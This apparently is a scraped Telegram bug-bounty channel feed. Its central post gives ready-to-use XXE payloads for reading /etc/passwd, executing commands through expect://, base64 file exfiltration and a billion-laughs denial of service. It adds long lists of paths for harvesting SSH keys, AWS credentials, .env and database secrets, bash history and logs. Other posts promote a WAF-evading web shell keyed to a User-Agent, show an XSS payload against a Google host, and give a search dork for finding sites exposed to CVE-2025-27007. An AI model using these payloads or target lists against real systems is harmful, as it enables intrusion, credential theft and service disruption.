javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0–9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();
Please open Telegram to view this post
VIEW IN TELEGRAM
❤25👍9🤝1🫡1
Hey everyone!
Sorry for not being active lately—been dealing with some health stuff. I’ll be back soon with loads of content.
Till then, @darkshadow2bd will keep posting cool stuff here.
Stay tuned and take care!
— Saumadip | Brut Security
Sorry for not being active lately—been dealing with some health stuff. I’ll be back soon with loads of content.
Till then, @darkshadow2bd will keep posting cool stuff here.
Stay tuned and take care!
— Saumadip | Brut Security
❤14👍3
🔥XXE to Remote Code Execution (RCE) – Real-World Attack Chain⚡
Hey Hunters,
DarkShadow here—dropping a quick tip for your next XXE hunt!
Escalate XXE vulnerability 😏
1. Basic XXE Payload (Test Injection)
2. RCE via expect:// PHP Wrapper (if enabled)
Result: Executes id command and returns output.
Condition: expect must be compiled with PHP (very rare, but deadly).
3. Local File Read using php://filter
Output: Base64-encoded content of /etc/passwd. Decode it locally. (Effective to bypass WAF filters and got any outputs correct format)
4. XML Bomb (DoS)
Effect: Crashes or DoS the XML parser due to entity expansion.
5. Read User Private Keys (SSH)
🛑Pro tip for more recon:
1. Steal AWS / Cloud Credentials via XXE
3. Bash History Abuse
5. Custom Internal Recon via /proc Files
Sometimes exposes secrets in memory or open database connections.
So guys what about my these methodology? If you guy's are really enjoyed, don't forget to show your love ❤️
Don't forget to follow me 👉🏼 DarkShadow
#bugbountytips #xxe
Hey Hunters,
DarkShadow here—dropping a quick tip for your next XXE hunt!
Escalate XXE vulnerability 😏
1. Basic XXE Payload (Test Injection)
<?xml version="1.0"?>If the response contains /etc/passwd, the app is XXE vulnerable.
<!DOCTYPE root [
<!ENTITY test SYSTEM "file:///etc/passwd">
]>
<root>&test;</root>
2. RCE via expect:// PHP Wrapper (if enabled)
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "expect://id">
]>
<root>&xxe;</root>
Result: Executes id command and returns output.
Condition: expect must be compiled with PHP (very rare, but deadly).
3. Local File Read using php://filter
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<foo>&xxe;</foo>
Output: Base64-encoded content of /etc/passwd. Decode it locally. (Effective to bypass WAF filters and got any outputs correct format)
4. XML Bomb (DoS)
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>
Effect: Crashes or DoS the XML parser due to entity expansion.
5. Read User Private Keys (SSH)
Useful Paths to Check:
/home/*/.ssh/id_rsa
/root/.ssh/id_rsa
/etc/ssh/ssh_config
/var/backups/
/proc/self/environ (for creds or keys in memory)
🛑Pro tip for more recon:
1. Steal AWS / Cloud Credentials via XXE
Also check:2. Dump Configs for DB Creds or Secrets
/home/www-data/.aws/credentials
/proc/self/environ (might expose AWS keys, tokens)
Also check:
config.php
.env
db.php
settings.php
wp-config.php (WordPress)
phpmyadmin/config.inc.php (phpmyadmin)
administrator/.env (joomla)
config/services.yaml (Symfony Framework)
app/config.js, app/config.json (nodejs)
settings.py, config.py (Python / Django / Flask)
application.properties, application.yml, web.xml (Java / Spring Boot / JSP Apps)
database.yml (Ruby on Rails)
3. Bash History Abuse
Also check:4. Read Logs for Token Harvesting
.bash_history
Sometimes contains:
MySQL login
Admin tools
SSH commands
Clear-text passwords
Web Server Logs:
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error_log
PHP / App-Specific Logs:
/var/log/php_errors.log
/var/log/php8.1-fpm.log
/var/log/php7.4-fpm.log
/var/log/php5-fpm.log
/var/log/php-fpm/www-error.log
Laravel / Symfony / Framework Logs:
storage/logs/laravel.log
/var/www/html/storage/logs/laravel.log
/var/www/html/app/storage/logs/laravel.log
var/log/dev.log (Symfony)
app/logs/dev.log
Authentication / Session Logs
/var/log/auth.log
/var/log/secure
/var/log/faillog
/var/log/wtmp
/var/log/btmp
/var/log/lastlog
System Logs (May Contain Leaks or Stack Traces):
/var/log/syslog
/var/log/messages
/var/log/dmesg
/var/log/kern.log
Database Logs (If Exposed):
/var/log/mysql/error.log
/var/log/postgresql/postgresql.log
/var/log/mariadb/mariadb.log
5. Custom Internal Recon via /proc Files
Also check:
/proc/self/cmdline
/proc/self/fd/
Sometimes exposes secrets in memory or open database connections.
So guys what about my these methodology? If you guy's are really enjoyed, don't forget to show your love ❤️
Don't forget to follow me 👉🏼 DarkShadow
#bugbountytips #xxe
👍19❤15🔥7🤨1🤝1
It’s lightweight, fast, and helps turn raw recon into insights.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10🔥6👍4
Good Morning Everyone 💥 💥 💥 💥 💥
So how's everything going on?🔥 👀
So how's everything going on?
Please open Telegram to view this post
VIEW IN TELEGRAM
❤14🔥8
Hey Hunters,
DarkShadow here again. We all know how frustrating it is to test file upload vulnerabilities—sometimes the file uploads, but you can’t execute it because WAFs or IDS jump in.
So, I’ve built a next-level, compact script that actually bypasses most WAF and IDS protections. It uses 3 stealth techniques to evade restrictions and offers 2 output modes for flexibility.
What makes it even cooler?
Wanna try it out? drop a comment and let me know. And of course, follow me on X → DarkShadow
#wafbypass
DarkShadow here again. We all know how frustrating it is to test file upload vulnerabilities—sometimes the file uploads, but you can’t execute it because WAFs or IDS jump in.
So, I’ve built a next-level, compact script that actually bypasses most WAF and IDS protections. It uses 3 stealth techniques to evade restrictions and offers 2 output modes for flexibility.
What makes it even cooler?
No password needed.
It uses a unique auth mechanism based on the User-Agent header—no login form, no cookies, nothing else. If your User-Agent matches, you’re in. If not, the script won’t even respond.
Wanna try it out? drop a comment and let me know. And of course, follow me on X → DarkShadow
#wafbypass
😱8👍7❤6🔥4🐳1🗿1
Hey Hunter's,
DarkShadow here back again. Dropping a Google XSS POC1😁
✅POC steps:
a simple XSS payload as usual😏
The vulnerability has been patched🥱
Don't forget to follow me 👉🏼 DarkShadow
#xss #poc #googlebug
DarkShadow here back again. Dropping a Google XSS POC1😁
✅POC steps:
Vuln host: aihub.cloud.google.com
Vuln param: /url?q= (GET method)
Tecniq: double url encoding
Payload: "><svg/onload=alert(document.domain)>
a simple XSS payload as usual😏
The vulnerability has been patched🥱
Don't forget to follow me 👉🏼 DarkShadow
#xss #poc #googlebug
😱10👍7🔥4🫡2🗿1
⚡WaybackLister is a reconnaissance tool that taps into the Wayback Machine to fetch historical URLs for a domain, parses unique paths, and checks if any of those paths currently expose directory listings. It's fast, multithreaded, and built for practical use in security assessments and bug bounty recon.
✅https://github.com/anmolksachan/wayBackLister
✅ Join Telegram For More Content: t.iss.one/brutsecurity
----------------------------------------------------------
🎓 Ready to Skill Up? Enroll Now → wa.link/brutsecurity
#CyberSecurity #BugBounty #EthicalHacking #Infosec #BrutSecurity
✅https://github.com/anmolksachan/wayBackLister
✅ Join Telegram For More Content: t.iss.one/brutsecurity
----------------------------------------------------------
🎓 Ready to Skill Up? Enroll Now → wa.link/brutsecurity
#CyberSecurity #BugBounty #EthicalHacking #Infosec #BrutSecurity
❤9👍7🔥5
CVE-2025-27007: Privilege Escalation in OttoKit WordPress Plugin, 9.8 rating 🔥
Errors in the logic of the plugin's API could potentially lead to an attacker gaining access to the administrator account. According to Patchstack, exploitation of the vulnerability began just an hour after public disclosure!
Search at Netlas.io:
👉 Link: https://nt.ls/y4FXX
👉 Dork: http.body:"plugins/suretriggers"
Read more: https://patchstack.com/database/wordpress/plugin/suretriggers/vulnerability/wordpress-suretriggers-1-0-82-privilege-escalation-vulnerability?_s_id=cve
Errors in the logic of the plugin's API could potentially lead to an attacker gaining access to the administrator account. According to Patchstack, exploitation of the vulnerability began just an hour after public disclosure!
Search at Netlas.io:
👉 Link: https://nt.ls/y4FXX
👉 Dork: http.body:"plugins/suretriggers"
Read more: https://patchstack.com/database/wordpress/plugin/suretriggers/vulnerability/wordpress-suretriggers-1-0-82-privilege-escalation-vulnerability?_s_id=cve
👍14
Good morning hackers 🥱
Need more Google bug POC's? 😁
ㅤ
Need more Google bug POC's? 😁
ㅤ
👍33🔥8😁2🤝2